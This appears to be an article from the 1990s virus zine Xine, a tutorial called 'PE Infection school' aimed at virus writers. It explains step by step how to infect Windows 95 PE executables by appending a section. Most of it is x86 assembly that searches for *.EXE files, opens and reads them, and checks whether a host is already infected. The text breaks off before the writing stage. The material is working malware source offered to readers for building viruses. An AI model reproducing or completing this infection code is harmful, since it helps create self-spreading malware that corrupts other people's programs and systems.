Copy Link
Add to Bookmark
Report
xine-2.011
/-----------------------------\
| Xine - issue #2 - Phile 011 |
\-----------------------------/
PE Infection school
by JHB
Infecting a PE files is a little complex unlike in dos, you must
also do some "strange" things to open and read files. For those among us
who do know little about Windows this may be tough to grasp but it just
another hurdle that Microsoft has put in virii writers/just plain hackers
of Win95.
I will try in this article to break it down into managable steps but I
will concentrate on the infection part and leave the other aspects to other
articles, and other people I hope to explain. This article will be specific
to a PE infector that will add a section. Try reading the last 2 vlad's and
IR latest zine for more info on RVA's and other PE win95 features.
Ok I will probaly glance over things that you might feel are important if
so I hope you take the hint that "you" might need to study some more.
Here we go school is in session, lets start with some info that we all
as virii writers or researchers should know the steps a virus makes to
spread.
1 Find a file
2 Read enough of the file into a buffer to determine
A If it is a file the virii can infect.
B If it is already infected
3 At this point we know the file is appears to be a proper
host.
A Write the virii to the end of the host.
B Modify the header, write it to the host
C Close the host
4 Well at this point we return control to the orginal host.
(this is a part I am going to only give a glimpse at)
Due to the way Win95 "guards" the interrupts, the virii needs to get access
to the Win API.
Bizatch: The first VLAD PE virus saves the API's address in it this
form of hardcodeing can cause the virus to fail in other
version of Win95.
Punch: The VLAD VxD virus does this by fooling with the imports and then fixing it so the host see it as it should be
Mr Klunky: IR's VxD virus, not sure sorry Mr K just have not had time
Murkry: The first PE header infector (by my friend) also use the
hardcodeing method
Spawn95: This virus is a companion virus and of course use the API's
like a normal PE program does
Puma : First seen in this issue of Zine 2 use a search engine
to get the API address. Should be more robust then the
hardcode method but Punch95 method should be a better
way.
Ok a brief synaspe of some Win95 virus and how they grab API's well I
wanted a simple way, and sorta wanted it to be like DOS infections. Hmm
well there is away to call int 21's in Win95 you need the first Exported
API which is called CallVxD0 by some books this program will use this method
this will have a added advatage of allowing the virus to use Int 21 like
calls. But may not be as robust as Punch's method, it should work better
than straight hardcodeing. Read the notes on the GetProc engine in Zine 2
to find out more about this. Also the article on hooking API's in Zine 2.
Wow thats enough of a Tangent and probaly bored the hell out of most
of ya ;). On to the virii code,
-----1 Find a file.
Well Win95 has a Findfirst and FindNext routine we can call using
VxDcall -int21(just called int21 for now on)
if this looks familiar it should its just the
Win95 version of int 21 4eh, and int 21 4fh
FILE equ 00400300h ;data
FNAME EQU 02CH ;for the find file routines
Fexe db '*.EXE',0
FindFile:
mov eax,0000714eh
mov edx,offset Fexe
xor esi,esi
inc esi
push ds
pop es
mov Edi, FILE
xor ecx,ecx
Call INT_21
mov ebx,eax
ret
;-------------------------------------------------------------
;ax = 714Fh
;bx = file handle from previous search
;si = date time requested
;es:di buffer for findata
;note ebx = the search handle
FindNext:
mov eax,0000714fh
mov esi,1
mov edi, FILE
call INT_21
ret
;-------------------------------------------------------------
-----2 Read enough of the file into a buffer to determine
----- A If it is a file the virii can infect.
again use the int21 open file
;-------------------------------------------------------------
;usual dos function here just need the filename from the search routine
;check cf for error
OpenFile:
mov eax,00003d02h
mov Edx,FILE + FNAME
xor ecx,ecx
call INT_21
mov EBX,eax
ret
;-------------------------------------------------------------
use the int21 read file
;-------------------------------------------------------------
;ecx number of bytes
;edx = where we write the info to
ReadFile:
mov eax, 00003f00h
;mov ecx,2
;mov Edx,OFFSET test
call INT_21
ret
;-------------------------------------------------------------
but win95 throws a problem here you cant write
to the host data it mite be initialize date and you
would destroy it. So I am using the "dead" space from the
PE header to the first segment to write to this is only
possible due to the fact the the VxD calls are ignoring the
limits that win95 can put on us. Then I can move the important
stuff to the stack and read write there. The stack is small
and rather than change it I use is as little as I can.
Ok we know have the header in memory the typical PE header is
including the intersting tables is about 1K in size. Actaul its
usual alot smaller but 1k will read in the dos MZ header and the
PE part.
-------B If it is already infected
Well for this test we can check the section names for our header
XINE is a good name as any ;). so we check to the last section
header.
1 find the PE find the offset by looking into the MZ header at
offset 3ch then use that offset to get the other info
just for simplicity () means the value we are pointing at
[] means a constant
PEhder(3CH) + PE_SIZE[F8H]+ ((NumSect(6)-1) * SecSze[28H])
ok this value is the pointer to the last section header name
now put this in esi and do lodsw
mov esi,[PEHDER] ;3Ch
push esi
add esi,6
mov eax,[esi]
dec eax
mov cx,SECSZE ;28h
mul cx
pop ecx
add eax,ecx
add eax,PeSize ;0F8h
push eax
pop esi
lodsd
cmp eax,"xki."
jne InfectIt
AllReady:
ret